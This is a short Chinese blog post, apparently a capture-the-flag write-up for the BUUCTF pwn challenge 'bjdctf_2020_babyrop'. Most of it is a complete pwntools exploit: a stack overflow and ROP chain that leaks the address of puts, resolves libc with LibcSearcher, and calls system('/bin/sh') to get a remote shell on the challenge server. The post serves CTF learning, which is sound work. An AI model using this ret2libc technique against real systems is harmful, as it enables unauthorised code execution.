BUUCTF-PWN-bjdctf_2020_babyrop

116次阅读
没有评论

共计 885 个字符,预计需要花费 3 分钟才能阅读完成。

提醒:本文最后更新于 2024-08-30 10:34,文中所关联的信息可能已发生改变,请知悉!

checksec

BUUCTF-PWN-bjdctf_2020_babyrop

IDA

BUUCTF-PWN-bjdctf_2020_babyrop

BUUCTF-PWN-bjdctf_2020_babyrop

又是基本的 ret2libc

BUUCTF-PWN-bjdctf_2020_babyrop

EXP

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

p = remote('node4.buuoj.cn', 25135)
elf = ELF('./bjdctf_2020_babyrop')

main_addr = elf.sym['main']
rdi_ret = 0x400733
ret = 0x4004c9
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

payload1 = b'a' * (0x20 + 0x8) + p64(rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

p.sendlineafter('story!\n', payload1)
puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8, b'\x00'))
print(hex(puts_addr))

libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

payload2 = b'a' * (0x20 + 0x8) + p64(ret) + p64(rdi_ret) + p64(binsh) + p64(sys_addr)
p.sendlineafter('story!\n', payload2)

p.interactive()

结果

BUUCTF-PWN-bjdctf_2020_babyrop

0 号就是正确的

BUUCTF-PWN-bjdctf_2020_babyrop

正文完
 0
icvuln
版权声明:本站原创文章,由 icvuln 于2022-01-18发表,共计885字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)